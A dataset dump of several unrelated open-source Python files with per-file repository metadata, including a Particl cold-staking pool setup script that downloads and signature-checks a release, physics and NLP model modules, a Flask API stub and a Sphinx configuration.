# type: () -> Dict[str, Any]
"""Returns the model properties as a dict"""
result = {self.name: self.value}
return result
def to_str(self):
# type: () -> str
"""Returns the string representation of the model"""
return pprint.pformat(self.value)
def __repr__(self):
# type: () -> str
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
# type: (Any) -> bool
"""Returns true if both objects are equal"""
if not isinstance(other, PermissionStatus):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
# type: (Any) -> bool
"""Returns true if both objects are not equal"""
return not self == other
| 27.014925 | 96 | 0.645856 |
4a2571bb532ed59190ee41ff0ebd3a0192551cfb | 16,050 | py | Python | bin/coldstakepool_prepare.py | AllienWorks/particl-coldstakepool | 16ef959adf4fc8c30d0c5c807439ee41d1f97810 | [
"MIT"
] | null | null | null | bin/coldstakepool_prepare.py | AllienWorks/particl-coldstakepool | 16ef959adf4fc8c30d0c5c807439ee41d1f97810 | [
"MIT"
] | null | null | null | bin/coldstakepool_prepare.py | AllienWorks/particl-coldstakepool | 16ef959adf4fc8c30d0c5c807439ee41d1f97810 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2018-2019 The Particl Core developers
# Distributed under the MIT software license, see the accompanying
# file LICENSE.txt or http://www.opensource.org/licenses/mit-license.php.
"""
Minimal example of starting a Particl stake pool.
1. Download and verify a particl-core release.
2. Create a particl.conf that:
- Starts 2 wallets
- Enables zmqpubhashblock
- Enables csindex and addressindex
3. Generate and import a recovery phrase for both wallets.
4. Generate the pool_stake_address from the staking wallet.
- The address pool participants will set their outputs to stake with.
5. Generate the pool_reward_address from the reward wallet.
- The address that will collect the rewards for blocks staked by the pool.
6. Disable staking on the reward wallet.
7. Set the reward address of the staking wallet.
8. Create the stakepool.json configuration file.
Install dependencies:
apt-get install wget gnupg
Run the prepare script:
coldstakepool-prepare.py -datadir=~/stakepoolDemoTest -testnet
Start the daemon:
~/particl-binaries/particld -datadir=/home/$(id -u -n)/stakepoolDemoTest
Start the pool script:
coldstakepool-run.py -datadir=~/stakepoolDemoTest/stakepool -testnet
"""
import sys
import os
import subprocess
import time
import json
import hashlib
import mmap
import urllib.request
from coldstakepool.util import (
callrpc_cli,
)
PARTICL_BINDIR = os.path.expanduser(os.getenv('PARTICL_BINDIR', '~/particl-binaries'))
PARTICLD = os.getenv('PARTICLD', 'particld')
PARTICL_CLI = os.getenv('PARTICL_CLI', 'particl-cli')
PARTICL_TX = os.getenv('PARTICL_CLI', 'particl-tx')
PARTICL_VERSION = os.getenv('PARTICL_VERSION', '0.18.0.10')
PARTICL_VERSION_TAG = os.getenv('PARTICL_VERSION_TAG', '')
PARTICL_ARCH = os.getenv('PARTICL_ARCH', 'x86_64-linux-gnu.tar.gz')
def startDaemon(nodeDir, bindir):
command_cli = os.path.join(bindir, PARTICLD)
args = [command_cli, '-daemon', '-connect=0', '-datadir=' + nodeDir]
p = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out = p.communicate()
if len(out[1]) > 0:
raise ValueError('Daemon error ' + str(out[1]))
return out[0]
class AppPrepare():
def __init__(self, mode='normal', test_param=None):
# Validate and process argument options
self.parse_args(mode, test_param)
# Initialize database connection
self.app_name = self.get_app_name(self.name)
def downloadParticlCore():
print('Download and verify Particl core release.')
if 'osx' in PARTICL_ARCH:
os_dir_name = 'osx-unsigned'
os_name = 'osx'
elif 'win32-setup' in PARTICL_ARCH or 'win64-setup' in PARTICL_ARCH:
os_dir_name = 'win-signed'
os_name = 'win-signer'
elif 'win32' in PARTICL_ARCH or 'win64' in PARTICL_ARCH:
os_dir_name = 'win-unsigned'
os_name = 'win'
else:
os_dir_name = 'linux'
os_name = 'linux'
signing_key_fingerprint = '8E517DC12EC1CC37F6423A8A13F13651C9CF0D6B'
signing_key_name = 'tecnovert'
if os_dir_name == 'win-signed':
url_sig = 'https://raw.githubusercontent.com/particl/gitian.sigs/master/%s-%s/%s/particl-%s' % (PARTICL_VERSION + PARTICL_VERSION_TAG, os_dir_name, signing_key_name, os_name)
assert_path = os.path.join(PARTICL_BINDIR, 'particl-%s-build.assert' % (os_name))
else:
url_sig = 'https://raw.githubusercontent.com/particl/gitian.sigs/master/%s-%s/%s/particl-%s-%s' % (PARTICL_VERSION + PARTICL_VERSION_TAG, os_dir_name, signing_key_name, os_name, PARTICL_VERSION)
assert_path = os.path.join(PARTICL_BINDIR, 'particl-%s-%s-build.assert' % (os_name, PARTICL_VERSION))
url_release = 'https://github.com/particl/particl-core/releases/download/v%s/particl-%s-%s' % (PARTICL_VERSION + PARTICL_VERSION_TAG, PARTICL_VERSION, PARTICL_ARCH)
if not os.path.exists(assert_path):
subprocess.check_call(['wget', url_sig + '-build.assert', '-P', PARTICL_BINDIR])
sig_path = os.path.join(PARTICL_BINDIR, 'particl-%s-%s-build.assert.sig' % (os_name, PARTICL_VERSION))
if not os.path.exists(sig_path):
subprocess.check_call(['wget', url_sig + '-build.assert.sig?raw=true', '-O', sig_path])
packed_path = os.path.join(PARTICL_BINDIR, 'particl-%s-%s' % (PARTICL_VERSION, PARTICL_ARCH))
if not os.path.exists(packed_path):
subprocess.check_call(['wget', url_release, '-P', PARTICL_BINDIR])
hasher = hashlib.sha256()
with open(packed_path, 'rb') as fp:
hasher.update(fp.read())
release_hash = hasher.digest()
print('Release hash:', release_hash.hex())
with open(assert_path, 'rb', 0) as fp, mmap.mmap(fp.fileno(), 0, access=mmap.ACCESS_READ) as s:
if s.find(bytes(release_hash.hex(), 'utf-8')) == -1:
sys.stderr.write('Error: release hash %s not found in assert file.' % (release_hash.hex()))
exit(1)
else:
print('Found release hash %s in assert file.' % (release_hash.hex()))
try:
subprocess.check_call(['gpg', '--list-keys', signing_key_fingerprint])
except Exception:
print('Downloading release signing pubkey')
keyservers = ['keyserver.ubuntu.com', 'hkp://subset.pool.sks-keyservers.net']
for ks in keyservers:
try:
subprocess.check_call(['gpg', '--keyserver', ks, '--recv-keys', signing_key_fingerprint])
except Exception:
continue
break
subprocess.check_call(['gpg', '--list-keys', signing_key_fingerprint])
try:
subprocess.check_call(['gpg', '--verify', sig_path, assert_path])
except Exception:
sys.stderr.write('Error: Signature verification failed!')
exit(1)
def extractParticlCore():
packed_path = os.path.join(PARTICL_BINDIR, 'particl-%s-%s' % (PARTICL_VERSION, PARTICL_ARCH))
daemon_path = os.path.join(PARTICL_BINDIR, PARTICLD)
bin_prefix = 'particl-%s/bin' % (PARTICL_VERSION)
subprocess.check_call(['tar', '-xvf', packed_path, '-C', PARTICL_BINDIR, '--strip-components', '2',
os.path.join(bin_prefix, PARTICLD), os.path.join(bin_prefix, PARTICL_CLI), os.path.join(bin_prefix, PARTICL_TX)])
output = subprocess.check_output([daemon_path, '--version'])
version = output.splitlines()[0].decode('utf-8')
print('particld --version\n' + version)
assert(PARTICL_VERSION in version)
def printVersion():
from coldstakepool import __version__
print('Particl coldstakepool version:', __version__)
def printHelp():
print('Usage: prepareSystem.py ')
print('\n--update_core Download, verify and extract Particl core release and exit.')
print('\n--download_core Download and verify Particl core release and exit.')
print('\n--datadir=PATH Path to Particl data directory, default:~/.particl.')
print('\n--pooldir=PATH Path to stakepool data directory, default:{datadir}/stakepool.')
print('\n--mainnet Run Particl in mainnet mode.')
print('\n--testnet Run Particl in testnet mode.')
print('\n--regtest Run Particl in regtest mode.')
print('\n--stake_wallet_mnemonic= Recovery phrase to use for the staking wallet, default is randomly generated.')
print('\n--reward_wallet_mnemonic= Recovery phrase to use for the reward wallet, default is randomly generated.')
print('\n--mode=master/observer Mode stakepool is initialised to. observer mode requires configurl to be specified, default:master.')
print('\n--configurl=url Url to pull the stakepool config file from when initialising for observer mode.')
def main():
dataDir = None
poolDir = None
chain = 'mainnet'
mode = 'master'
configurl = None
stake_wallet_mnemonic = None
reward_wallet_mnemonic = None
for v in sys.argv[1:]:
if len(v) < 2 or v[0] != '-':
print('Unknown argument', v)
continue
s = v.split('=')
name = s[0].strip()
for i in range(2):
if name[0] == '-':
name = name[1:]
if name == 'v' or name == 'version':
printVersion()
return 0
if name == 'h' or name == 'help':
printHelp()
return 0
if name == 'update_core':
downloadParticlCore()
extractParticlCore()
return 0
if name == 'download_core':
downloadParticlCore()
return 0
if name == 'mainnet':
continue
if name == 'testnet':
chain = 'testnet'
continue
if name == 'regtest':
chain = 'regtest'
continue
if len(s) == 2:
if name == 'datadir':
dataDir = os.path.expanduser(s[1])
continue
if name == 'pooldir':
poolDir = os.path.expanduser(s[1])
continue
if name == 'stake_wallet_mnemonic':
stake_wallet_mnemonic = s[1]
continue
if name == 'reward_wallet_mnemonic':
reward_wallet_mnemonic = s[1]
continue
if name == 'mode':
mode = s[1]
if mode != 'master' and mode != 'observer':
sys.stderr.write('Unknown value for mode:' + mode)
exit(1)
continue
if name == 'configurl':
configurl = s[1]
continue
print('Unknown argument', v)
if mode == 'observer' and configurl is None:
sys.stderr.write('observer mode requires configurl set\n')
exit(1)
if not os.path.exists(PARTICL_BINDIR):
os.makedirs(PARTICL_BINDIR)
# 1. Download and verify the specified version of particl-core
downloadParticlCore()
extractParticlCore()
dataDirWasNone = False
if dataDir is None:
dataDir = os.path.expanduser('~/.particl')
dataDirWasNone = True
if poolDir is None:
if dataDirWasNone:
poolDir = os.path.join(os.path.expanduser(dataDir), ('' if chain == 'mainnet' else chain), 'stakepool')
else:
poolDir = os.path.join(os.path.expanduser(dataDir), 'stakepool')
print('dataDir:', dataDir)
print('poolDir:', poolDir)
if chain != 'mainnet':
print('chain:', chain)
if not os.path.exists(dataDir):
os.makedirs(dataDir)
if not os.path.exists(poolDir):
os.makedirs(poolDir)
# 2. Create a particl.conf
daemonConfFile = os.path.join(dataDir, 'particl.conf')
if os.path.exists(daemonConfFile):
sys.stderr.write('Error: %s exists, exiting.' % (daemonConfFile))
exit(1)
zmq_port = 207922 if chain == 'mainnet' else 208922
with open(daemonConfFile, 'w') as fp:
if chain != 'mainnet':
fp.write(chain + '=1\n\n')
fp.write('zmqpubhashblock=tcp://127.0.0.1:%d\n' % (zmq_port))
chain_id = 'test.' if chain == 'testnet' else 'regtest.' if chain == 'regtest' else ''
fp.write(chain_id + 'wallet=pool_stake\n')
fp.write(chain_id + 'wallet=pool_reward\n')
fp.write('csindex=1\n')
fp.write('addressindex=1\n')
startDaemon(dataDir, PARTICL_BINDIR)
# Delay until responding
for k in range(10):
try:
callrpc_cli(PARTICL_BINDIR, dataDir, chain, 'getblockchaininfo')
break
except Exception:
time.sleep(0.5)
try:
if mode == 'observer':
print('Preparing observer config.')
settings = json.loads(urllib.request.urlopen(configurl).read().decode('utf-8'))
settings['mode'] = 'observer'
settings['particlbindir'] = PARTICL_BINDIR
settings['particldatadir'] = dataDir
pool_stake_address = settings['pooladdress']
pool_reward_address = settings['rewardaddress']
v = callrpc_cli(PARTICL_BINDIR, dataDir, chain, 'validateaddress "%s"' % (pool_stake_address))
assert('isvalid' in v)
assert(v['isvalid'] is True)
callrpc_cli(PARTICL_BINDIR, dataDir, chain, '-rpcwallet=pool_stake importaddress "%s"' % (v['address']))
callrpc_cli(PARTICL_BINDIR, dataDir, chain, '-rpcwallet=pool_reward importaddress "%s"' % (pool_reward_address))
poolConfFile = os.path.join(poolDir, 'stakepool.json')
if os.path.exists(poolConfFile):
sys.stderr.write('Error: %s exists, exiting.' % (poolConfFile))
exit(1)
with open(poolConfFile, 'w') as fp:
json.dump(settings, fp, indent=4)
print('Done.')
return 0
# 3. Generate and import a recovery phrase for both wallets.
if stake_wallet_mnemonic is None:
stake_wallet_mnemonic = callrpc_cli(PARTICL_BINDIR, dataDir, chain, 'mnemonic new')['mnemonic']
if reward_wallet_mnemonic is None:
reward_wallet_mnemonic = callrpc_cli(PARTICL_BINDIR, dataDir, chain, 'mnemonic new')['mnemonic']
callrpc_cli(PARTICL_BINDIR, dataDir, chain, '-rpcwallet=pool_stake extkeyimportmaster "%s"' % (stake_wallet_mnemonic))
callrpc_cli(PARTICL_BINDIR, dataDir, chain, '-rpcwallet=pool_reward extkeyimportmaster "%s"' % (reward_wallet_mnemonic))
# 4. Generate the pool_stake_address from the staking wallet.
pool_stake_address = callrpc_cli(PARTICL_BINDIR, dataDir, chain, '-rpcwallet=pool_stake getnewaddress')
pool_stake_address = callrpc_cli(PARTICL_BINDIR, dataDir, chain, '-rpcwallet=pool_stake validateaddress %s true' % (pool_stake_address))['stakeonly_address']
# 5. Generate the pool_reward_address from the reward wallet.
pool_reward_address = callrpc_cli(PARTICL_BINDIR, dataDir, chain, '-rpcwallet=pool_reward getnewaddress')
# 6. Disable staking on the reward wallet.
callrpc_cli(PARTICL_BINDIR, dataDir, chain, '-rpcwallet=pool_reward walletsettings stakingoptions "{\\"enabled\\":\\"false\\"}"')
# 7. Set the reward address of the staking wallet.
callrpc_cli(PARTICL_BINDIR, dataDir, chain, '-rpcwallet=pool_stake walletsettings stakingoptions "{\\"rewardaddress\\":\\"%s\\"}"' % (pool_reward_address))
finally:
callrpc_cli(PARTICL_BINDIR, dataDir, chain, 'stop')
# 8. Create the stakepool.json configuration file.
html_port = 9000 if chain == 'mainnet' else 9001
poolsettings = {
'mode': 'master',
'debug': True,
'particlbindir': PARTICL_BINDIR,
'particldatadir': dataDir,
'startheight': 200000, # Set to a block height before the pool begins operating
'pooladdress': pool_stake_address,
'rewardaddress': pool_reward_address,
'zmqhost': 'tcp://127.0.0.1',
'zmqport': zmq_port,
'htmlhost': 'localhost',
'htmlport': html_port,
'parameters': [
{
'height': 0,
'poolfeepercent': 3,
'stakebonuspercent': 5,
'payoutthreshold': 0.5,
'minblocksbetweenpayments': 100,
'minoutputvalue': 0.1,
},
]
}
poolConfFile = os.path.join(poolDir, 'stakepool.json')
if os.path.exists(poolConfFile):
sys.stderr.write('Error: %s exists, exiting.' % (poolConfFile))
exit(1)
with open(poolConfFile, 'w') as fp:
json.dump(poolsettings, fp, indent=4)
print('NOTE: Save both the recovery phrases:')
print('Stake wallet recovery phrase:', stake_wallet_mnemonic)
print('Reward wallet recovery phrase:', reward_wallet_mnemonic)
print('Stake address:', pool_stake_address)
print('Reward address:', pool_reward_address)
print('Done.')
if __name__ == '__main__':
main()
| 38.123515 | 202 | 0.634517 |
4a2572c846548c847117be633b77f43b19aabea6 | 1,523 | py | Python | felpy/model/materials/phase_mask.py | twguest/FELpy | 0ac9dd965b0d8e04dddbf2c9aef5ac137d1f0dfd | [
"Apache-2.0"
] | 1 | 2021-03-15T14:04:19.000Z | 2021-03-15T14:04:19.000Z | felpy/model/materials/phase_mask.py | twguest/FELpy | 0ac9dd965b0d8e04dddbf2c9aef5ac137d1f0dfd | [
"Apache-2.0"
] | 2 | 2021-11-27T11:55:48.000Z | 2021-11-27T11:56:26.000Z | felpy/model/materials/phase_mask.py | twguest/FELpy | 0ac9dd965b0d8e04dddbf2c9aef5ac137d1f0dfd | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
FELPY
__author__ = "Trey Guest"
__credits__ = ["Trey Guest"]
__license__ = "EuXFEL"
__version__ = "1.0.1"
__maintainer__ = "Trey Guest"
__email__ = "[email protected]"
__status__ = "Developement"
"""
import numpy as np
from wpg.srwlib import SRWLOptD as Drift
from felpy.model.src.coherent import construct_SA1_wavefront
from felpy.model.core.beamline import Beamline
from wpg.srwlib import srwl_opt_setup_surf_height_2d as OPD
from wpg.wpg_uti_wf import plot_intensity_map as plotIntensity
from matplotlib import pyplot as plt
from felpy.model.materials.material_utils import add_extent
def plot_phase(wfr):
phase = wfr.get_phase()[:,:,0]
plt.imshow(phase, cmap = 'hsv')
plt.show()
def phase_mask(phase_shift, extent, wav, _ang = 0, outdir = None, maskName = None):
"""
:param phase_shift: 2D array of desired phase-shifts
:param extent: extent of phase-mask array in realspace
:param wav: radiation wavelength
"""
height_error = (phase_shift*wav)/(2*np.pi)
height_error = add_extent(height_error, extent)
if outdir is not None:
if maskName is not None:
outdir = outdir + maskName + ".dat"
else:
outdir = outdir + "phase_mask.dat"
np.savetxt(outdir, height_error)
return OPD(height_error,
_dim = 'x',
_ang = 0,
_refl = 1,
_x = 0, _y = 0)
| 25.813559 | 83 | 0.645437 |
4a2572e4f940de20047f7aa275c539e3c49bd71f | 290 | py | Python | nere/re_models/__init__.py | WangShengguang/NERE | 4b8166aa348b9db207bb9a1e1da6eed5d567ae6f | [
"MIT"
] | null | null | null | nere/re_models/__init__.py | WangShengguang/NERE | 4b8166aa348b9db207bb9a1e1da6eed5d567ae6f | [
"MIT"
] | null | null | null | nere/re_models/__init__.py | WangShengguang/NERE | 4b8166aa348b9db207bb9a1e1da6eed5d567ae6f | [
"MIT"
] | 1 | 2021-08-21T09:21:21.000Z | 2021-08-21T09:21:21.000Z | from .acnn import ACNN
from .att_bilstm import ATT_BiLSTM
from .bert_multitask import BERTMultitask
from .bert_softmax import BERTSoftmax
from .bilstm import BiLSTM
from .bilstm_att import BiLSTM_ATT
__all__ = ["ACNN", "BERTSoftmax", "BERTMultitask", "ATT_BiLSTM", "BiLSTM", "BiLSTM_ATT"]
| 32.222222 | 88 | 0.796552 |
4a25748f9260feca54c0ada9a316bb3aff6f76c9 | 1,692 | py | Python | appengine/findit/model/base_try_job_data.py | mcgreevy/chromium-infra | 09064105713603f7bf75c772e8354800a1bfa256 | [
"BSD-3-Clause"
] | 1 | 2018-01-02T05:47:07.000Z | 2018-01-02T05:47:07.000Z | appengine/findit/model/base_try_job_data.py | mcgreevy/chromium-infra | 09064105713603f7bf75c772e8354800a1bfa256 | [
"BSD-3-Clause"
] | null | null | null | appengine/findit/model/base_try_job_data.py | mcgreevy/chromium-infra | 09064105713603f7bf75c772e8354800a1bfa256 | [
"BSD-3-Clause"
] | null | null | null | # Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from google.appengine.ext import ndb
from model.base_try_job import BaseTryJob
class BaseTryJobData(ndb.Model):
"""Represents a tryjob's metadata."""
# When this entity was created.
created_time = ndb.DateTimeProperty(indexed=True)
# When the try job completed.
end_time = ndb.DateTimeProperty(indexed=True)
# Error message and reason, if any.
error = ndb.JsonProperty(indexed=False)
# Error code if anything went wrong with the try job.
error_code = ndb.IntegerProperty(indexed=True)
# The last buildbucket build response received.
last_buildbucket_response = ndb.JsonProperty(indexed=False, compressed=True)
# When the try job was requested according to buildbucket.
request_time = ndb.DateTimeProperty(indexed=True)
# When the try job began executing.
start_time = ndb.DateTimeProperty(indexed=True)
# The url to the try job build page.
try_job_url = ndb.StringProperty(indexed=False)
# An ndb key to the try job entity this data is associated with.
try_job_key = ndb.KeyProperty(indexed=False)
# A URL to call back the pipeline monitoring the progress of this tryjob.
callback_url = ndb.StringProperty(indexed=False)
# The name of the target for the callback url
callback_target = ndb.StringProperty(indexed=False)
@ndb.ComputedProperty
def master_name(self): # pragma: no cover
return BaseTryJob.GetMasterName(self.try_job_key)
@ndb.ComputedProperty
def builder_name(self): # pragma: no cover
return BaseTryJob.GetBuilderName(self.try_job_key)
| 31.924528 | 78 | 0.763002 |
4a25752166105f4401ffd723875af7003fafbbd2 | 2,598 | py | Python | api.py | zhengsl/SmartInvetory | 8b0229b1acf075096d2edac53951fc81acecbeb5 | [
"Apache-2.0"
] | null | null | null | api.py | zhengsl/SmartInvetory | 8b0229b1acf075096d2edac53951fc81acecbeb5 | [
"Apache-2.0"
] | null | null | null | api.py | zhengsl/SmartInvetory | 8b0229b1acf075096d2edac53951fc81acecbeb5 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from dao_base import *
from flask import jsonify
@app.route('/smartinventory/decision/base/province?name=<names>', methods=['GET'])
def get_base_province(names):
if names == 'all':
return jsonify(query_province_all())
else:
result = []
for name in names.split(','):
p = query_province_by_name(name)
if not p:
p = query_province_by_fullname(name)
if p:
result.append(p)
return jsonify(result)
@app.route('/smartinventory/decision/base/province_city?name=<name>&id=<pid>', methods=['GET'])
def get_base_province_city(name, pid):
return 'Hello API 1.2'
@app.route('/smartinventory/decision/base/city?name=<name>', methods=['GET'])
def get_base_city(name):
return 'Hello API 1.3'
@app.route('/smartinventory/decision/base/express/sf?from=<from_city>&to=<to_city>', methods=['GET'])
def get_base_express_sf(from_city, to_city):
return 'Hello API 1.4'
@app.route('/smartinventory/decision/base/metadata?id=<data_id>', methods=['GET'])
def get_base_metadata(data_id):
return 'Hello API 1.5'
@app.route('/smartinventory/decision/stats/sales/province', methods=['POST'])
def stat_sales_province():
return 'Hello API 2.1'
@app.route('/smartinventory/decision/stats/sales/city', methods=['POST'])
def stat_sales_province():
return 'Hello API 2.2'
@app.route('/smartinventory/decision/stats/packages/province', methods=['POST'])
def stat_packages_province():
return 'Hello API 2.3'
@app.route('/smartinventory/decision/stats/packages/city', methods=['POST'])
def stat_packages_province():
return 'Hello API 2.4'
@app.route('/smartinventory/decision/stats/express/province', methods=['POST'])
def stat_express_cost_province():
return 'Hello API 2.5'
@app.route('/smartinventory/decision/stats/express/city', methods=['POST'])
def stat_express_cost_province():
return 'Hello API 2.6'
@app.route('/smartinventory/decision/plan/warehouse/static', methods=['POST'])
def plan_warehouse_static():
return 'Hello API 3.1'
@app.route('/smartinventory/decision/plan/warehouse/dynamic', methods=['POST'])
def plan_warehouse_dynamic():
return 'Hello API 3.2'
@app.route('/smartinventory/decision/forecast/sales/province', methods=['POST'])
def forecast_sales_province():
return 'Hello API 4.1'
@app.route('/smartinventory/decision/forecast/sales/city', methods=['POST'])
def forecast_sales_city():
return 'Hello API 4.2'
if __name__ == '__main__':
app.run(api_host, api_port)
| 27.638298 | 101 | 0.694765 |
4a25752b1de9a1d720e7004b3e6324f6d2976046 | 1,081 | py | Python | param.py | facebookresearch/neuromorph | e6e6433537bc42d9150bcad931d6fbd4aea3f751 | [
"BSD-2-Clause"
] | 28 | 2021-11-01T19:14:30.000Z | 2022-01-13T04:53:24.000Z | param.py | marvin-eisenberger/neuromorph | e6e6433537bc42d9150bcad931d6fbd4aea3f751 | [
"BSD-2-Clause"
] | 1 | 2022-02-24T18:06:05.000Z | 2022-02-24T18:06:05.000Z | param.py | marvin-eisenberger/neuromorph | e6e6433537bc42d9150bcad931d6fbd4aea3f751 | [
"BSD-2-Clause"
] | 4 | 2021-11-30T12:09:52.000Z | 2022-01-17T15:13:24.000Z | # Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import torch
import pathlib
import os
from datetime import datetime
path_curr = str(pathlib.Path(__file__).parent.absolute())
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
device_cpu = torch.device('cpu')
data_folder_faust_remeshed = "data/meshes/FAUST_r/mat"
data_folder_mano_right = "data/meshes/MANO_right/mat"
data_folder_mano_test = "data/meshes/MANO_test/mat"
data_folder_shrec20 = "data/meshes/SHREC_r/mat"
chkpt_folder = "data/checkpoint"
data_folder_out = "data/out"
def get_timestr():
now = datetime.now()
time_stamp = now.strftime("%Y_%m_%d__%H_%M_%S")
print("Time stamp: ", time_stamp)
return time_stamp
def save_path(folder_str=None):
if folder_str is None:
folder_str = get_timestr()
folder_path_models = os.path.join(chkpt_folder, folder_str)
print("Checkpoint path: ", folder_path_models)
return folder_path_models
| 27.717949 | 69 | 0.749306 |
4a25754a88d98bd0b88562f9d9ebbeebd449a020 | 10,896 | py | Python | doc/conf.py | baztian/jpype | 034d44e6c719995c25e9cd61348ebc1860030a9b | [
"Apache-2.0"
] | null | null | null | doc/conf.py | baztian/jpype | 034d44e6c719995c25e9cd61348ebc1860030a9b | [
"Apache-2.0"
] | null | null | null | doc/conf.py | baztian/jpype | 034d44e6c719995c25e9cd61348ebc1860030a9b | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#
# JPype documentation build configuration file, created by
# sphinx-quickstart on Wed Feb 26 20:16:40 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.napoleon', 'sphinx.ext.autodoc', 'sphinx.ext.autosectionlabel', 'readthedocs_ext.readthedocs', ]
autosectionlabel_prefix_document = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'JPype'
copyright = u'2014-18, Steve Menard, Luis Nell and others'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
from unittest import mock
def TypeMock_init(self, *args, **kwargs):
object.__init__(self)
def TypeMock_getattr(self, key):
kwargs = self._kwargs
m = self._to(**kwargs)
object.__setattr__(self, key, m)
return m
class TypeMock(type):
def __new__(cls, name, bases=None, members={}, to=mock.Mock, **kwargs):
if not bases:
bases = tuple([])
members['__init__'] = TypeMock_init
members['__getattr__'] = TypeMock_getattr
members['_kwargs'] = kwargs
members['_to'] = to
members['__slots__'] = []
return type.__new__(cls, name, bases, members)
def __init__(self, *args, **kwargs):
return type.__init__(self, *args)
def __getattr__(self, key):
kwargs = self._kwargs
m = self._to(**kwargs)
type.__setattr__(self, key, m)
return m
class _JClass(type):
pass
class _JClassHints(object):
def __init__(self):
self.bases = []
def _addClassBases(self, *args):
pass
def _addTypeConversion(self, *args):
pass
def _addAttributeConversion(self, *args):
pass
def _excludeConversion(self, *args):
pass
mockModule = mock.MagicMock()
mockModule.isStarted = mock.Mock(return_value=False)
mockModule._JArray = TypeMock("_JArray")
mockModule._JClass = _JClass
mockModule._JField = TypeMock("_JField")
mockModule._JMethod = TypeMock("_JMethod")
mockModule._JObject = TypeMock("_JObject")
mockModule._JPackage = TypeMock("_JPackage")
mockModule._JClassHints = _JClassHints
mockModule._hasClass = lambda x: False
sys.modules['_jpype'] = mockModule
# For some reason jpype.imports does not work if called in sphinx. Importing
# it here solved the problem.
import jpype
import jpype.imports
version = jpype.__version__
# The full version, including alpha/beta/rc tags.
release = jpype.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# on_rtd is whether we are on readthedocs.org, this line of code grabbed from docs.readthedocs.org
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# otherwise, readthedocs.org uses their theme by default, so no need to specify it
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = 'logo.png'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
html_context = {
'css_files': [
'_static/theme_overrides.css', # override wide tables in RTD theme
],
}
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
